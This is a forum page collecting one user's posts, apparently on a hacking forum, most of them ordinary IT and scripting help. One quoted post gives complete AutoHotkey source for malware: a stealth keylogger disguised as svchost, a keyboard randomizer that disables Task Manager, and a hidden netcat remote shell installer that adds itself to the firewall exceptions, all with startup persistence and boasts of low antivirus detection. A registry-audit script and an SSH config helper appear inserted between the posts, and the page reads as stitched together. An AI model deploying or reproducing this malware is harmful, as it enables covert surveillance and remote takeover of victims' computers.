Posts posted by X3N

  1. I downloaded the files and now I'm reading the au3 files. What's the purpose of GUI.au3?

    Is the original host files copied and reinstalled after the iso is updated?

    :edit answered

    FileCopy( @SystemDir & "\drivers\etc\hosts", @SystemDir & "\drivers\etc\hosts.orig" )
    ..
    ..
    If FileExists( @SystemDir & "\drivers\etc\hosts.orig")  Then
    FileCopy( @SystemDir & "\drivers\etc\hosts.orig", @SystemDir & "\drivers\etc\hosts" )

    WOW!

    yeah that's what I made it do

  2. Metasploit comes with a Ruby script to disable AV which works the same as the old way but had a nice good list of process names of AV.

  3. Yes you can!!

    I have done so with my U3 drive.

    It has Backtrack 3 bootable, whereas if I plug it into a computer (that's capable of booting from USB) and turn on the computer, and select boot from USB on the boot menu (after pressing the right key, usually F12) it will boot up Backtrack 3 instead of the host OS.

    Also if I plug my device into any Windows XP machine my custom ISO will autorun my app. (It doesn't work on Vista though.)

    So yes, it's possible to make your drive bootable, and still have your U3 autorun intact for Windows machines...

    With Backtrack 3 it's simple to set the drive up to boot, follow the instructions. Just make sure you change the MBR of your USB drive, not anything else!!

    what version of U3 drive did you use? I've been looking into preserving the U3 functionality and booting...

    I've already made a Backtrack bootable USB drive before but it wasn't U3.... did you use the same process?

  4. kool, looking at the page there are a lot of frameworks. what would you recommend for a first timer with Python? any really good tuts you recommend?

    it really depends on what you are developing for... if I was developing an app for Windows I'd just use the native Windows API but if I wanted something cross platform I might use GTK. honestly I hardly use GUIs at all in my programming... I prefer the CLI

    As far as tutorials, I always find it easiest to pick apart the examples that the dev kits usually come with in order to figure it out.

  5. there are a lot of options for this...

    in the open source area you have Clonezilla which is a clone of Ghost

    there's also dd which is my fave...

    non-open-source stuff that I've used is Ghost, which works well.

    also Acronis True Image

    really though the best is dd if you learn how to use that because it does a bit for bit exact copy... a lot of these other programs compress the free space which speeds up the process and makes the image smaller but if you want an exact copy then you should use dd. I've had unpredictable things happen with the MBR when using tools other than dd. Plus dd works over netcat nicely in case you wanted to do it over the network.

  6. I'm not exactly sure where you got the tar package from, but I was able to find pre-compiled versions of the RTL8187SE wifi module for Ubuntu. Assuming that this is the module that corresponds to your wifi card, the easiest way to get your wireless working would be to download the .deb package.

    I found it here and according to the author's website the latest version of the package is this one.

    There is a longer list of other packages, including for 8.04 here.

    I'm pretty sure that it should install with

    dpkg --install name-of-package.deb

    If it tells you that there are unmet dependencies, try

    apt-get install name-of-whatever-it-complains-about name-of-something-else

    Hope that helps.

    Also, should mention, I've never used it, but I believe that Linux Mint is basically Ubuntu made easy (which was supposed to be Debian made easy). You might want to try that.

    Mint Linux is just as easy as regular Ubuntu but Mint is prettier.

  7. WARNING VERY LONG POST!

    For sometime now, i've been coding stuff in c, in fact i wrote versions of keyl and keyr in c, then i found ahk while trying to find a way to install my cmdo payload in a single .exe, turns out ahk has been used on this forum before, but i forgot about it until a few days ago. AHK is an awesome scripting lang that takes all the hard work out of keyboard hooks! So i re-wrote the apps, and here is the ahk source code, so everyone can learn how fun and easy this scripting lang is. Post bugs if you find them, and have fun! Feel free to hack/mod/use this code anyway you want (works nicely with usb payloads). :)

    None of these programs are illegal. Morality and legality lie in the application of knowledge, not in the information itself.

    PM/IRC/AIM me with questions.

    PROGRAMS AND FEATURES

    1. Keyr

    -Randomizes Keys on the keyboard

    -Adds itself to startup (regkey)

    -Works on WinXP / Vista

    -Disables Task Mgr (regkey)

    -Press WinKey + X to quit

    -Only about 10% of AntiVirus found it (VirusTotal)

    [Download keyr v1]

    MD5...: de40e57473c719d84da9b1a9e2527a86

    2. Keyl

    -Your basic keylogger, saves keystrokes to C:\WINDOWS\keyl.txt

    -Adds itself to startup (RegKey)

    -Completely Stealthed

    -Looks like svchost while running

    -Works on XP / Vista

    -Press WinKey + X to quit

    -Only about 5% of AntiVirus found it (VirusTotal)

    [Download keyl v1.1]

    MD5...: ebb7ab566064661707956a64be7f01b3

    3. Cmdo

    -Updated Cmdo Payload

    -Installs a Netcat backdoor (reverse shell)

    -Single .exe Install File

    -Adds itself to startup (regkey)

    -Completely Stealthed

    -In XP adds itself to the firewall exceptions list, and hides itself from the GUI

    -Easy to use Auto Connect Script

    -Downside is nc.exe has 68% detection rate (VirusTotal)

    [Download cmdo v1]

    MD5...: 260f8f4566635734a8c663358752c108

    AHK SOURCE CODE

    So basically for all of them, there is the actual .exe's (contain the payload), and the install file, the install file only needs to be run once, and it adds regkeys/makes dirs/sets attribs/etc, i commented the code best i could

    >Keyr

    keyr_install.exe

    ;Install Keyr.exe into root of C:
    ;Keyr Script has to be compiled first!
    #NoTrayIcon
    FileInstall, .\keyr.exe, C:\keyr.exe
    ;add to startup
    RegWrite REG_SZ,HKEY_LOCAL_MACHINE,software\microsoft\windows\currentversion\run,keyr,C:\keyr.exe
    ;disable task mgr
    RegWrite REG_DWORD,HKEY_CURRENT_USER,software\microsoft\windows\currentversion\policies\system,DisableTaskMgr,1
    FileSetAttrib, +SH, C:\keyr.exe
    Run C:\keyr.exe
    ExitApp

    keyr.exe

    ;KeyStroke Randomizer
    ;keyr.exe v1.0
    ;By SableFoXx
    
    #NoEnv
    #NoTrayIcon
    #InstallKeybdHook
    
    #x::
    MsgBox, Exit Function Invoked
    ExitApp
    
    ;----------------
    ;  ALPHA KEYS
    ;----------------
    ; The $ stops recusrion
    $a::GetAlpha()
    $b::GetAlpha()    
    $c::GetAlpha()
    $d::GetAlpha()
    $e::GetAlpha()
    $f::GetAlpha()
    $g::GetAlpha()
    $h::GetAlpha()
    $i::GetAlpha()
    $j::GetAlpha()
    $k::GetAlpha()
    $l::GetAlpha()
    $m::GetAlpha()
    $n::GetAlpha()
    $o::GetAlpha()
    $p::GetAlpha()
    $q::GetAlpha()
    $r::GetAlpha()
    $s::GetAlpha()
    $t::GetAlpha()
    $u::GetAlpha()
    $v::GetAlpha()
    $w::GetAlpha()
    ;$x::GetAlpha() - Only if you're evil
    $y::GetAlpha()
    $z::GetAlpha()
    ; Don't Forget CAPS!
    $+a::GetAlpha()
    $+b::GetAlpha()    
    $+c::GetAlpha()
    $+d::GetAlpha()
    $+e::GetAlpha()
    $+f::GetAlpha()
    $+g::GetAlpha()
    $+h::GetAlpha()
    $+i::GetAlpha()
    $+j::GetAlpha()
    $+k::GetAlpha()
    $+l::GetAlpha()
    $+m::GetAlpha()
    $+n::GetAlpha()
    $+o::GetAlpha()
    $+p::GetAlpha()
    $+q::GetAlpha()
    $+r::GetAlpha()
    $+s::GetAlpha()
    $+t::GetAlpha()
    $+u::GetAlpha()
    $+v::GetAlpha()
    $+w::GetAlpha()
    $+x::GetAlpha()
    $+y::GetAlpha()
    $+z::GetAlpha()
    
    CapsLock::MsgBox, WARNING: This Button Does Nothing!
    
    ;----------------
    ;    NUM KEYS
    ;----------------
    $0::GetNum()
    $1::GetNum()
    $2::GetNum()
    $3::GetNum()
    $4::GetNum()
    $5::GetNum()
    $6::GetNum()
    $7::GetNum()
    $8::GetNum()
    $9::GetNum()
    $Numpad0::GetNum()
    $Numpad1::GetNum()
    $Numpad2::GetNum()
    $Numpad3::GetNum()
    $Numpad4::GetNum()
    $Numpad5::GetNum()
    $Numpad6::GetNum()
    $Numpad7::GetNum()
    $Numpad8::GetNum()
    $Numpad9::GetNum()
    
    ;Fun-Sions
    
    GetNum(){
        Random, num, 0, 10
        if(num = 10)
            Shutdown, 4
        else
            SendInput, %num%
    }
    
    GetAlpha(){
    ; I wish i could so a switch()
    Random, alpha, 1, 26
        
    If(alpha = 1)
        SendInput, a
    If(alpha = 2)
    
        SendInput, b
    If(alpha = 3)
        SendInput, c
    If(alpha = 4)
        SendInput, d
    If(alpha = 5)
        SendInput, e
    If(alpha = 6)
        SendInput, f
    If(alpha = 7)
        SendInput, g
    If(alpha = 8)
        SendInput, h
    If(alpha = 9)
        SendInput, i
    If(alpha = 10)
        SendInput, j
    If(alpha = 11)
        SendInput, k
    If(alpha = 12)
        SendInput, l
    If(alpha = 13)
        SendInput, m
    If(alpha = 14)
        SendInput, n
    If(alpha = 15)
        SendInput, o
    If(alpha = 16)
        SendInput, p
    If(alpha = 17)
        SendInput, q
    If(alpha = 18)
        SendInput, r
    If(alpha = 19)
        SendInput, s
    If(alpha = 20)
        SendInput, t
    If(alpha = 21)
        SendInput, u
    If(alpha = 22)
        SendInput, v
    If(alpha = 23)
        SendInput, w
    If(alpha = 24)
        SendInput, x
    If(alpha = 25)
        SendInput, y
    If(alpha = 26)
        SendInput, z
    }
    
    ; -=d0tmayhem=-

    >keyl

    keyl_install.exe

    ;Install Svchost.exe into the root C:\
    ;Keyl Script has to be compiled first,
    ;and renamed to svchost, after being compiled
    ;==============================================
    #NoTrayIcon
    
    ;Remove old one
    IfNotExist, C:\svchost.exe, goto install
    SendInput, #x
    Sleep, 1000
    FileSetAttrib, -SH, C:\svchost.exe
    
    install:
    FileInstall, .\svhost.exe, C:\svhost.exe, 1
    RegWrite REG_SZ,HKEY_LOCAL_MACHINE,software\microsoft\windows\currentversion\run,svchost,C:\svchost.exe
    
    
    FileSetAttrib, +SH, C:\svchost.exe
    Run, C:\svchost.exe
    ExitApp

    keyl.exe

    ;=======================
    ; Keylogger (keyl.exe)
    ; By SableFoXx
    ; v1.1
    ;=======================
    
    #NoEnv
    #NoTrayIcon
    #InstallKeybdHook
    #SingleInstance, Force
    
    SetWorkingDir %SystemRoot%
    FileAppend, `n[%A_MM%/%A_DD%/%A_YYYY% %A_hour%:%A_min%], C:\WINDOWS\keyl.txt
    Spc := " "
    
    #x::
    ;WinKey + X to stop program
    MsgBox, 0, -=d0tmayhem=-, Keyl has been stopped, 10
    ExitApp
    
    ;----------------
    ;  ALPHA KEYS
    ;----------------
    $a::AlphaKey("a", "A")
    $b::AlphaKey("b", "B")
    $c::AlphaKey("c", "C")
    $d::AlphaKey("d", "D")
    $e::AlphaKey("e", "E")
    $f::AlphaKey("f", "F")
    $g::AlphaKey("g", "G")
    $h::AlphaKey("h", "H")
    $i::AlphaKey("i", "I")
    $j::AlphaKey("j", "J")
    $k::AlphaKey("k", "K")
    $l::AlphaKey("l", "L")
    $m::AlphaKey("m", "M")
    $n::AlphaKey("n", "N")
    $o::AlphaKey("o", "O")
    $p::AlphaKey("p", "P")
    $q::AlphaKey("q", "Q")
    $r::AlphaKey("r", "R")
    $s::AlphaKey("s", "S")
    $t::AlphaKey("t", "T")
    $u::AlphaKey("u", "U")
    $v::AlphaKey("v", "V")
    $w::AlphaKey("w", "W")
    $x::AlphaKey("x", "X")
    $y::AlphaKey("y", "Y")
    $z::AlphaKey("z", "Z")
    ;**Caps Keys**
    $+a::TransKey("+a", "A")
    $+b::TransKey("+b", "B")
    $+c::TransKey("+c", "C")
    $+d::TransKey("+d", "D")
    $+e::TransKey("+e", "E")
    $+f::TransKey("+f", "F")
    $+g::TransKey("+g", "G")
    $+h::TransKey("+h", "H")
    $+i::TransKey("+i", "I")
    $+j::TransKey("+j", "J")
    $+k::TransKey("+k", "K")
    $+l::TransKey("+l", "L")
    $+m::TransKey("+m", "M")
    $+n::TransKey("+n", "N")
    $+o::TransKey("+o", "O")
    $+p::TransKey("+p", "P")
    $+q::TransKey("+q", "Q")
    $+r::TransKey("+r", "R")
    $+s::TransKey("+s", "S")
    $+t::TransKey("+t", "T")
    $+u::TransKey("+u", "U")
    $+v::TransKey("+v", "V")
    $+w::TransKey("+w", "W")
    $+x::TransKey("+x", "X")
    $+y::TransKey("+y", "Y")
    $+z::TransKey("+z", "Z")
    
    ;----------------
    ;   NUM KEYS
    ;----------------
    $0::GenKey("0")
    $1::GenKey("1")
    $2::GenKey("2")
    $3::GenKey("3")
    $4::GenKey("4")
    $5::GenKey("5")
    $6::GenKey("6")
    $7::GenKey("7")
    $8::GenKey("8")
    $9::GenKey("9")
    ;**Numpad Keys**
    $Numpad0::GenKey("0")
    $Numpad1::GenKey("1")
    $Numpad2::GenKey("2")
    $Numpad3::GenKey("3")
    $Numpad4::GenKey("4")
    $Numpad5::GenKey("5")
    $Numpad6::GenKey("6")
    $Numpad7::GenKey("7")
    $Numpad8::GenKey("8")
    $Numpad9::GenKey("9")
    ;**NumPad Symbls**
    $NumpadDot::GenKey(".")
    $NumpadDiv::GenKey("/")
    $NumpadSub::GenKey("-")
    $NumpadMult::GenKey("*")
    $NumpadAdd::ModfKey("+")
    $NumpadDel::ModfKey("Del")
    $NumpadEnd::ModfKey("End")
    $NumpadHome::ModfKey("Home")
    $NumpadPgUp::ModfKey("PgUp")
    $NumpadPgDn::ModfKey("PgDn")
    $NumpadIns::ModfKey("Insert")
    $NumpadEnter::ModfKey("Enter")
    
    ;----------------
    ;   FUNC KEYS
    ;----------------
    $F1::ModfKey("F1")
    $F2::ModfKey("F2")
    $F3::ModfKey("F3")
    $F4::ModfKey("F4")
    $F5::ModfKey("F5")
    $F6::ModfKey("F6")
    $F7::ModfKey("F7")
    $F8::ModfKey("F8")
    $F9::ModfKey("F9")
    $F10::ModfKey("F10")
    $F11::ModfKey("F11")
    $F12::ModfKey("F12")
    
    ;----------------
    ;   SYBL KEYS
    ;----------------
    $+0::TransKey("+0", ")")
    $+3::TransKey("+3", "#")
    $+4::TransKey("+4", "$")
    $+5::TransKey("+5", "%")
    $+6::TransKey("+6", "^")
    $+7::TransKey("+7", "&")
    $+8::TransKey("+8", "*")
    $+9::TransKey("+9", "(")
    
    $-::GenKey("-")
    $=::GenKey("=")
    $[::GenKey("[")
    $]::GenKey("]")
    $;::GenKey(";")
    $'::GenKey("'")
    $,::GenKey(",")
    $.::GenKey(".")
    $/::GenKey("/")
    $\::GenKey("\")
    $+-::GenKey("_")
    $+`::GenKey("~")
    $+;::GenKey(":")
    $+,::GenKey("<")
    $+.::GenKey(">")
    $+/::GenKey("?")
    $+\::GenKey("|")
    
    $+[::ModfKey("{")
    $+]::ModfKey("}")
    $+=::ModfKey("+")
    $`::TransKey("``", "``")
    
    ;----------------
    ;   SPCL KEYS
    ;----------------
    ;These are used by ahotkey
    ;and need SendRaw to work
    
    $+1::
    SendRaw, !
    FileAppend, !, C:\WINDOWS\keyl.txt
    Return
    
    $+2::
    SendRaw, @
    FileAppend, @, C:\WINDOWS\keyl.txt
    Return
    
    $+'::
    SendRaw, "
    FileAppend, ", C:\WINDOWS\keyl.txt
    Return
    
    ;----------------
    ;   MODF KEYS
    ;----------------
    $!::ModfKey("Alt")
    $^::ModfKey("Ctrl")
    $Tab::ModfKey("Tab")
    $End::ModfKey("End")
    $Home::ModfKey("Home")
    $PgUp::ModfKey("PgUp")
    $PgDn::ModfKey("PgDn")
    $Enter::ModfKey("Enter")
    $Pause::ModfKey("Pause")
    $+Pause::ModfKey("Break")
    $Insert::ModfKey("Insert")
    $Delete::ModfKey("Delete")
    $Backspace::ModfKey("Backspace")
    $PrintScreen::ModfKey("PrintScreen")
    
    $CapsLock::CapsLock()
    
    $Space::
    SendInput, {Space}
    FileAppend, %Spc%, C:\WINDOWS\keyl.txt
    Return
    
    ;========================================================
    ;                                       FUNCTIONS
    ;========================================================
    ;GenKey   - Generic Key, takes one argument (the keystroke), appends same value to log
    ;Alpahkey - Takes the lower(akey)/upper(ukey) case alpha value and returns a lower, or upper 
    ;        depending on the state in which CapsLock is set
    ;TransKey - Translate Key, takes two arguments, the first is the raw keystroke (skey) and
    ;           the secound is the alrdy translated key you want appended to the log file (xkey)
    ;ModfKey  - Modifer Key, these are your ALT, WIN, and TAB keys, the arg should be the string you
    ;           want passed to SendInput, Modf key strokes are marked with "[" and "]" in the log file
    ;CapsLock - First finds what state the CapsLock is in, then toggles it and appends the log
    ;           file with either [CAPS-ON] or [CAPS-OFF]
    
    GenKey(gkey){
        SendInput, %gkey%
        FileAppend, %gkey%, C:\WINDOWS\keyl.txt
    }
    AlphaKey(akey, ukey){
        state := GetKeyState("Capslock", "T")
        if(state == "0"){
            SendInput, %akey%
            FileAppend, %akey%, C:\WINDOWS\keyl.txt
        }else{
            SendInput, %ukey%
            FileAppend, %ukey%, C:\WINDOWS\keyl.txt
         }
    }
    TransKey(skey, xkey){
        SendInput, %skey%
        FileAppend, %xkey%, C:\WINDOWS\keyl.txt
    }
    ModfKey(mkey){
        SendInput, {%mkey%}
        FileAppend, [%mkey%], C:\WINDOWS\keyl.txt
    }    
    CapsLock(){    
        state := GetKeyState("Capslock", "T")
    
        if(state == "1"){
            SetCapsLockState, Off
            FileAppend, [CAPS-OFF], C:\WINDOWS\keyl.txt
        }else{
            SetCapsLockState, On
            FileAppend, [CAPS-ON], C:\WINDOWS\keyl.txt
        }
    }
    
    ; -=d0tmayhem=-

    >Cmdo [Download .exes]

    cmdo_install.exe

    ;Setup Cmdo Payload
    ;By SableFoXx
    #NoEnv
    #NoTrayIcon
    
    FileCreateDir, C:\cmdo
    FileSetAttrib, +SH, C:\cmdo
    
    FileInstall, .\cmdo.exe, C:\cmdo\cmdo.exe
    FileInstall, .\hidec.exe, C:\cmdo\hidec.exe
    FileInstall, .\nc.exe, C:\cmdo\nc.exe
    
    FileSetAttrib, +SH, C:\cmdo\cmdo.exe
    FileSetAttrib, +SH, C:\cmdo\hidec.exe
    FileSetAttrib, +SH, C:\cmdo\nc.exe
    
    ;Startup Key XP / VISTA
    RegWrite REG_SZ,HKEY_LOCAL_MACHINE,software\microsoft\windows\currentversion\run,svchost,C:\cmdo\cmdo.exe
    
    IfExist C:\WINDOWS\system32\wuapp.exe
    goto done
    
    xp:
    ;XP Firewall Key
    RegWrite REG_SZ,HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List,C:\cmdo\nc.exe,C:\cmdo\nc.exe:*:Enabled:@xpsp2res.dll,-22019
    goto done
    
    done:
    Run, C:\cmdo\cmdo.exe
    ExitApp

    cmdo.exe

    ;Cmdo.exe
    ;by SableFoXx
    ;Runs NC
    
    #NoEnv
    #NoTrayIcon
    #SingleInstance, Force
    
    Run, C:\cmdo\hidec.exe nc.exe -l -t -p 69 -d -e cmd.exe
    
    ExitApp

    Information is Free

    Damn that was a long post :)

    whats the cpu load for the keylogger?
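A defender-side check for the registry changes the installer scripts in this post make (Run-key autostart, `DisableTaskMgr`, and the XP firewall `AuthorizedApplications\List` entry), as an added example that is not code from the post or its author. It audits a regedit-format export; the sample export, the trusted-directory list, the system-name list and the rule names are assumptions constructed for illustration.

```python
import ntpath
import re

# Constructed sample in regedit export format, modelled on the keys the posted
# installer scripts write; "ExampleUpdater" is a made-up benign entry.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run]
"keyr"="C:\\keyr.exe"
"svchost"="C:\\cmdo\\cmdo.exe"
"ExampleUpdater"="\"C:\\Program Files\\Example\\updater.exe\" /background"

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\system]
"DisableTaskMgr"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\\cmdo\\nc.exe"="C:\\cmdo\\nc.exe:*:Enabled:@xpsp2res.dll,-22019"
'''

VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')
RUN_SUFFIXES = (r"\currentversion\run", r"\currentversion\runonce")
SYSTEM32 = "c:\\windows\\system32\\"
# Assumption: directories where autostart binaries are expected on this host.
TRUSTED_DIRS = (SYSTEM32, "c:\\program files\\", "c:\\program files (x86)\\")
# Assumption: a few Windows process names that malware commonly borrows.
SYSTEM_NAMES = {"svchost", "lsass", "csrss", "winlogon", "services"}


def _unescape(text):
    """Undo .reg escaping (\\\\ -> \\ and \\" -> ")."""
    return re.sub(r"\\(.)", lambda m: m.group(1), text)


def parse_reg_export(text):
    """Return (key, value_name, data) tuples; data is str or int (dword)."""
    entries, key = [], None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = VALUE_RE.match(line)
        if not m or key is None:
            continue
        name, data = _unescape(m.group(1)), m.group(2)
        if data.startswith("dword:"):
            entries.append((key, name, int(data[6:], 16)))
        elif len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            entries.append((key, name, _unescape(data[1:-1])))
    return entries


def image_path(command):
    """Extract the executable path from an autostart command line."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:].split('"', 1)[0]
    m = re.match(r"(?i)(.+?\.exe)\b", command)
    return m.group(1) if m else command.split(" ", 1)[0]


def is_trusted(path):
    # normpath collapses "..", so "C:\Program Files\..\x.exe" is not trusted.
    return ntpath.normpath(path).lower().startswith(TRUSTED_DIRS)


def _stem(path):
    return ntpath.splitext(ntpath.basename(path))[0].lower()


def audit(entries):
    """Return (rule, value_name, detail) findings for the parsed entries."""
    findings = []
    for key, name, value in entries:
        k = key.lower()
        if k.endswith(RUN_SUFFIXES) and isinstance(value, str):
            exe = image_path(value)
            if not is_trusted(exe):
                findings.append(("run-key-untrusted-path", name, exe))
            in_sys32 = ntpath.normpath(exe).lower().startswith(SYSTEM32)
            if {name.lower(), _stem(exe)} & SYSTEM_NAMES and not in_sys32:
                findings.append(("system-name-masquerade", name, exe))
        elif (k.endswith(r"\policies\system")
              and name.lower() == "disabletaskmgr" and value == 1):
            hive = key.split("\\", 1)[0]
            findings.append(("taskmgr-disabled", name, hive))
        elif k.endswith(r"\authorizedapplications\list") and isinstance(value, str):
            # The value name is the allowed program's path.
            if ":enabled" in value.lower() and not is_trusted(name):
                findings.append(("firewall-exception-untrusted-path", name, value))
    return findings


if __name__ == "__main__":
    for rule, name, detail in audit(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(f"{rule:36} {name:18} {detail}")
```

Paths containing unexpanded environment variables (for example `%windir%`) are reported as untrusted by this check, so expand them before auditing a real export.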

  8. This client of ours wants a simple FTP server with permissions and groups. We started out with an ubuntu server 8.10, but permission settings were beginning to be a hassle.

    We hooked them up with the latest version of FreeNAS, but we're just having too many problems with permissions on the SFTP... I'm about 2 days away from saying %#@$ it and making them buy windows server 2003 to just vpn over and use network shared resources.

    I looked for a good guide on how to configure file permissions for groups of people, but i'm having a really hard time getting chmod/chown to work on a specific user/folder.

    Does anyone know of an sftp / smb server program that lets the admin configure user permissions on certain folders? Or of a site that does a good job explaining how to use permissions on linux?

    read the freenas manual

  9. I don't think there's a good tech way to solve this problem. It seems like the problem would solve itself the first time they're busy with something, call you, walk away, and come back to see you hadn't done anything waiting on them.

    I mean, if they're calling you for help, can't you just tell them to wait for you to get there or to make sure their screen isn't locked when you arrive?

    actually there is a good way to fix all this. Like I had mentioned before, logon scripts and using the GPO editor to manipulate group policies.

    then use UltraVNC to remote control if need be....

    even if you installed ssh you could run scripts to fix whatever is wrong with their setup.

  10. psexec: you need admin privileges to run over the network...

    pstools is a set of tools that do a bunch of really cool stuff... has nothing to do with script kiddies

  11. The people in my house can be trusted and wouldn't know where the heck to start with hacking me. I guess I could understand your concern with security. The problem with using an instant messenger program is that the user might not always be by his/her computer but would be in the same room. Yeah, I suppose an intercom might be an idea but that's really not an option. I'll just try to figure it out on my own. I think you have given me a good start especially with the psexec tool. I might just give this idea up and try something else. Unless you know how to use sockets in VB.NET 2008 to create a messenger program...

    Thanks for all of your help,

    Micah C

    first download autoIT then paste this into a txt file called beepstart.au3

    $cmd = "psexec \\testmachine -u DOMAIN\USER -p PASSWORD -c beep.exe"
    Run($cmd)
    

    make sure to change the machine and password part to match your machine.

    Then in another file called beep.au3 paste this

    Beep()
    

    Compile the beep.au3 to an exe

    now all you have to do is double click the beep.au3 or you can compile it to an exe as well. either way you could just make a shortcut for whoever to click on in order to make your computer beep.

  12. The batch script simply creates a beeping sound. Try it out. All I wanted to do is allow one user to click a button on a vb.net form which would execute this script on my computer or vice versa alerting me that a user needs assistance. Does that make sense? I'll try to re-explain if it doesn't. Any ideas? remember the users are not computer savvy so something with a GUI interface would be helpful. Thanks for your help so far. I know I'm a noob @ this sort of thing. Am I just making this harder than it needs to be?

    sounds like you're better off using an instant messenger program... and if you're in the same house you might as well use an intercom....

    the problem i don't like with what you're trying to do is that you really don't want people having access to your computer like that... remote command execution via a button sounds pretty insecure to me.

  13. The reason I would like to use vb.net 2008 1. because I know that language best 2. is because the users that will be using this program are not very computer savvy. I was hoping to have a nice GUI so that there is no confusion between the other users. The main goal of this program is to create a beeper so that a family member in one room can simply "beep" me indicating that that user needs assistance. Originally i tried using sockets in VB. I am not very experienced with this so i gave that idea up and moved on to something like we have here.

    Any ideas?,

    Micah C

    what exactly are you trying to do here? what was that script supposed to do?

  14. Thanks X3N i have found psexec to be a very useful tool for executing and managing remote files. Is it possible to pass this command through VB.NET 2008 with a button control?

    Command to be passed with VB.NET 2008:

    psexec \\Work1 program "C:\Myprogram.exe"

    Any Help is greatly appreciated,

    Micah C

    it might be possible but kind of redundant... what is the environment you are trying to use this in? you could just write a wrapper in vb for psexec i prefer autoIT to vb and there's a few wrappers on the forums for autoit...

    Why do you want to use VB?

  15. Hey all,

    I've decided to implement all your suggestions thus far.

    ddns updater

    ping

    ?mail? -- I need to play with that one a while.

    ?ftp? if mailing doesn't workout

    also I've been looking at windows built-in utilities (hence ftp instead of blat).

    perhaps getmac, ipconfig will be in there next as well to give some more device specific evidence to the authorities in case of theft.

    Again this isn't aimed at uber-hackers so I'm working under the assumption that at least one of the methods will work properly. So if the schmuck at school steals your drive you can turn over the logs to the police and the campus IT department can give them what they need.

    i have some autoIT code that will email to gmail using ssl without having to use blat or stunnel...

    i actually have a full payload that dumps all the info over ssl to gmail via autoIT it's posted in the usbhacks section.

  16. another way to do this is to use a service like dyndns... which is basically a little program that logs into the dyndns server to bind a name to a dynamic ip address... this could easily be scripted to autorun on a usb drive... the only problem is that if someone has autorun turned off then it totally defeats the purpose because you can't force autorun to run if it's disabled.

  17. sorry lol so I'll just create multiple accounts with shell "/bin/false" and no rw access? Because I'm thinking about having them pay weekly to use it and if they don't I'll just disable/remove their account

    and is there a way to add which accounts can't be logged into through ssh like the /etc/ftpusers file for ftp logins so i don't have to remove their account to disable access if they don't pay?

    man if your friends are stupid enough to pay 2 bucks a week for access then that's great for you but sucks for them...for that money you could get some ssh or vpn access elsewhere...that's actually secure...

    your best bet is the keypairing though if you're going to use ssh to do this...
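
The question quoted in this post asks for an SSH counterpart to /etc/ftpusers. As an added example that is not part of the original posts: OpenSSH's `DenyUsers` directive in sshd_config blocks named accounts without removing them. The helper names and the sample config are constructed for illustration, and the helpers handle literal account names only.

```shell
# Added example (not from the original posts): turn one account's SSH access
# off or on through sshd's DenyUsers directive, leaving the account in place.

# Constructed sample config; a real host would use /etc/ssh/sshd_config.
write_sample_cfg() {
    printf '%s\n' 'Port 22' 'PasswordAuthentication no' 'DenyUsers mallory' \
        'Match Group tunnel' '    AllowTcpForwarding yes' > "$1"
}

# set_ssh_denied FILE USER on|off   (hypothetical helper name)
set_ssh_denied() {
    cfg=$1 user=$2 state=$3
    # DenyUsers takes patterns, so accept plain account names only:
    # a stray "*" or "?" would lock out other users as well.
    case $user in
        ''|-*|*[!a-z0-9_-]*) echo "refusing user name: $user" >&2; return 2 ;;
    esac
    tmp=$(mktemp) || return 1
    awk -v user="$user" -v state="$state" '
        function add_line() { if (state == "on" && !done) { print "DenyUsers " user; done = 1 } }
        # A directive placed after "Match" applies to that block only, so a
        # new DenyUsers line has to go in before the first Match.
        tolower($1) == "match" && !in_match { add_line(); in_match = 1 }
        tolower($1) == "denyusers" && !in_match {
            line = $1
            for (i = 2; i <= NF; i++) if ($i != user) line = line " " $i
            if (state == "on" && !done) { line = line " " user; done = 1 }
            if (line != $1) print line    # drop the directive once it is empty
            next
        }
        { print }
        END { add_line() }
    ' "$cfg" > "$tmp" && cat "$tmp" > "$cfg"    # cat keeps owner and mode
    rc=$?
    rm -f "$tmp"
    return $rc
}

# is_ssh_denied FILE USER: true if USER is named on a global DenyUsers line.
is_ssh_denied() {
    awk -v user="$2" '
        tolower($1) == "match" { exit }
        tolower($1) == "denyusers" { for (i = 2; i <= NF; i++) if ($i == user) found = 1 }
        END { exit !found }
    ' "$1"
}

# Demo on the constructed config: deny "alice", then print the result.
demo=$(mktemp) && write_sample_cfg "$demo" && set_ssh_denied "$demo" alice on
cat "$demo"; rm -f "$demo"
```

After editing the real file, run `sshd -t` to validate it and reload sshd; sessions that are already open are not closed by the change.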

  18. Dear Hak5 Community,

    I am looking for a way to execute and stop programs on a computer over my LAN. something really simple. I was hoping that I could execute it through a VB.NET 2008 program. I need to execute this batch file:

    ::== beep.bat
    @echo off
    
    > d.d echo e 100 07
    >> d.d echo n 07.bin
    >> d.d echo rcx
    >> d.d echo 1
    >> d.d echo w
    >> d.d echo q
    debug < d.d > nul
    copy 07.bin con > nul
    del d.d
    del 07.bin
    ::== DONE

    Any help is greatly appreciated.

    if you are on a windows domain you can pass the script through the group policy that computer belongs to... if you are not on a domain then your best bet is to copy the script to the computer and telnet or ssh into it and run the script.

    another option is using one of the sysinternals tools like psexec to remotely run a command over the network. Sometimes what I will do is use psexec to spawn a remote command shell which is a little more secure than enabling telnet....

  19. Hmm... didn't know that!

    I'll have to try and find a third-party tool that can do that on a domain :rolleyes:

    really this is a non-issue.

    There are two ways around this. First if you are running windows server then you should be using active directory to push any changes out to machines and depending on your server setup it may take a few hours for the changes to sync across the domain.

    The second way of getting around this is to make sure the person doesn't lock their computer.

    I found this on some site.... not the preferred way to do it but an option. It would be better to do it using the GPO editor.

    If random users chose to lock the system (by pressing Ctrl+Alt+Delete and clicking the Lock Computer button), an administrator would need to manually unlock the system. To avoid this, the Lock Computer button can be disabled.

